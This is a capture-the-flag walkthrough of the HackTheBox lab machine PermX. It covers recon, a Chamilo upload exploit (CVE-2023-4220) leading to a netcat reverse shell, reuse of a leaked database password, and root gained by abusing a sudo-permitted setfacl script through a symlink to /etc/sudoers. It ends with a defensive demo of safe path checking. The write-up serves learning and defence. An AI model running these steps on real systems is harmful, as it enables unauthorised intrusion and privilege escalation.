PermX is an Easy Linux box on HTB. I really enjoyed it and I think it’s a good machine for beginners to see some techniques and to think outside the box. Let’s get started!
Reconnaissance
nmap
First thing, I launched an nmap scan with nmap -sV -sC -oN tcpscan 10.10.11.23 -p-
I added -p- (all 65535 TCP ports instead of the default top 1000) to be sure not to miss any unusual TCP ports.
Nmap scan report for permx.htb (10.10.11.23)
Host is up (0.015s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 e2:5c:5d:8c:47:3e:d8:72:f7:b4:80:03:49:86:6d:ef (ECDSA)
|_ 256 1f:41:02:8e:6b:17:18:9c:a0:ac:54:23:e9:71:30:17 (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-title: eLEARNING
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nothing much: besides SSH, we’ve got a web server running on port 80, so let’s see what it holds for us.
Opening the IP in a browser, we are redirected to http://permx.htb. In order to access the site we need to add an entry to our /etc/hosts file mapping the IP to permx.htb. Once that is done we reach a simple e-learning website. After spending some time looking around the site for a login form or anything interactive and finding nothing, I decided to launch a subdomain enumeration.
Subdomain Enumeration
I’m using ffuf for subdomain (virtual host) enumeration with the following command:
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://permx.htb -H "Host: FUZZ.permx.htb" -mc 200
This fuzzes the Host header against the one IP we have, so it finds name-based virtual hosts without any DNS. Matching only on status 200 works here because, as we saw when browsing by IP, the default virtual host answers unknown names with a redirect to permx.htb rather than a 200; if the default vhost answered everything with 200, you would filter on response size with -fs instead.
After a bit, we get a hit on the lms subdomain, which means there is a site hosted at lms.permx.htb. We promptly add this to our hosts file too, to be able to access it in a browser.
Exploitation
Shell as www-data
We’re welcomed by what seems to be a Learning Management System called Chamilo, presenting a login form. I tried some default credentials, but this yielded nothing but errors.
So I went on and searched for an exploit for Chamilo and found this repository exploiting CVE-2023-4220, an unauthenticated file upload in Chamilo’s big-file-upload feature (versions up to 1.11.24) that leads to remote code execution.
I downloaded the code and ran it against the Chamilo instance, providing the script the necessary information (host to connect back to, port to connect back to, name of the shell, name of the webshell) while listening with netcat (nc -lvnp 4242) in order to catch the reverse shell spawned by the exploit.
We get a shell as www-data! My usual next step after getting an initial shell is looking for passwords that may be re-used. Looking in /home tells us the user is mtz. Going through Chamilo’s configuration files, we find the following line in /var/www/chamilo/app/config/configuration.php:
$_configuration['db_password'] = '03F6lY3uXAP2bkW8';
Shell as mtz
We immediately try to connect over SSH with the username mtz and the password 03F6lY3uXAP2bkW8… and it’s a match! The database password is re-used for the user account. We have a shell as mtz and can read user.txt, getting the first flag.
Shell as root
I usually check the output of sudo -l because it can be a source of easy privilege escalation. This is what we got:
User mtz may run the following commands on permx:
(ALL : ALL) NOPASSWD: /opt/acl.sh
We can execute /opt/acl.sh as root without a password, so let’s see what this script is all about:
#!/bin/bash
if [ "$#" -ne 3 ]; then
/usr/bin/echo "Usage: $0 user perm file"
exit 1
fi
user="$1"
perm="$2"
target="$3"
if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then
/usr/bin/echo "Access denied."
exit 1
fi
# Check if the path is a file
if [ ! -f "$target" ]; then
/usr/bin/echo "Target must be a file."
exit 1
fi
/usr/bin/sudo /usr/bin/setfacl -m u:"$user":"$perm" "$target"
So basically the script lets us set an ACL (any user and permission combination setfacl accepts) on any regular file under /home/mtz/. The two checks only look at the string we pass in: it must start with /home/mtz/ and must not contain .., so we cannot escape with path traversal dots. What the script never does is resolve the path before checking it: both the -f test and setfacl follow symbolic links, so a path can start with /home/mtz/ while the file it actually reaches lives anywhere on the system.
The solution
We can make use of a symbolic link (kinda like a shortcut on Windows) pointing at / to build a path that starts with /home/mtz/ but resolves to /etc/sudoers, grant ourselves write access to that file, and finally run a shell as root.
- We create a symbolic link to the root of the filesystem inside the /home/mtz folder: ln -s / /home/mtz/hello
- Then we craft our payload. The path passes both checks (it starts with /home/mtz/ and contains no ..) but resolves to /etc/sudoers: sudo /opt/acl.sh mtz rwx /home/mtz/hello/etc/sudoers
- Now that the ACL gives mtz write access, we can edit the sudoers file and add this line: mtz ALL=(ALL:ALL) ALL
  Be careful with the edit: a syntax error in sudoers makes sudo refuse to run at all, and on this box that would cut off our only route to root.
- We can now get a shell as root just by running sudo bash, and retrieve the root.txt flag with cat.
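To make the weakness in /opt/acl.sh concrete, here is an added example (not part of the original post, nor the box’s own script) that puts the string-only check from the script next to a hardened version which canonicalises the path before comparing. The function names (naive_check, safe_check, make_fixture, demo) and the fixture tree are my own constructions: a temporary directory stands in for /home/mtz and a sibling directory stands in for /etc, so nothing touches real system files. It assumes a readlink that supports -f (GNU coreutils or busybox).

```shell
#!/bin/sh
# Added example: the path check from /opt/acl.sh next to a symlink-aware version.
# All directory and file names are constructed for the demo; /home/mtz is never used.

# naive_check BASE TARGET
# Mirrors /opt/acl.sh: the string must start with BASE/, must not contain "..",
# and must name an existing regular file. Symlinks are never resolved, and
# [ -f ] follows them, so a symlink inside BASE that reaches outside passes.
naive_check() {
    base="$1"; target="$2"
    case "$target" in
        "$base"/*) ;;         # allowed prefix
        *) return 1 ;;
    esac
    case "$target" in
        *..*) return 1 ;;     # dot-dot anywhere in the string
    esac
    [ -f "$target" ]
}

# safe_check BASE TARGET
# Refuses a symlink argument outright, canonicalises BASE and TARGET with
# readlink -f (every component resolved), and only then applies the prefix
# and regular-file tests to the real path.
safe_check() {
    base="$1"; target="$2"
    [ -L "$target" ] && return 1
    real=$(readlink -f -- "$target" 2>/dev/null) || return 1
    realbase=$(readlink -f -- "$base" 2>/dev/null) || return 1
    case "$real" in
        "$realbase"/*) ;;
        *) return 1 ;;
    esac
    [ -f "$real" ]
}

# make_fixture: build a throwaway tree and print its root.
#   ROOT/home/notes.txt                 legitimate file in the allowed tree
#   ROOT/outside/secret                 stands in for /etc/sudoers
#   ROOT/home/hello -> ROOT/outside     the "ln -s / /home/mtz/hello" trick
#   ROOT/home/direct -> ROOT/outside/secret   symlink straight at the file
make_fixture() {
    root=$(mktemp -d) || return 1
    mkdir -p "$root/home" "$root/outside"
    echo "notes" > "$root/home/notes.txt"
    echo "root ALL=(ALL:ALL) ALL" > "$root/outside/secret"
    ln -s "$root/outside" "$root/home/hello"
    ln -s "$root/outside/secret" "$root/home/direct"
    printf '%s\n' "$root"
}

# demo: run both checks over the fixture and print a verdict per path.
# Returns 0 when the naive check is fooled by the symlink and the hardened one is not.
demo() {
    root=$(make_fixture) || return 1
    home="$root/home"
    for t in "$home/notes.txt" "$home/hello/secret" "$home/direct" "$home/../outside/secret"; do
        naive_check "$home" "$t" && n=accept || n=reject
        safe_check  "$home" "$t" && s=accept || s=reject
        printf '%-28s naive=%-6s safe=%s\n' "${t#$root}" "$n" "$s"
    done
    naive_check "$home" "$home/hello/secret" && ! safe_check "$home" "$home/hello/secret"
    status=$?
    rm -rf "$root"
    return $status
}

demo
```

Running it prints one line per path: notes.txt is accepted by both, the two symlinked paths are accepted by naive_check and rejected by safe_check, and the .. path is rejected by both. Note that canonicalising is a mitigation, not a complete fix: because /home/mtz is writable by the user, a directory component could still be swapped for a symlink between the check and the setfacl call (a time-of-check/time-of-use race), so a root-run script should not accept user-chosen paths at all if it can be avoided.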
Thank you for following this post :)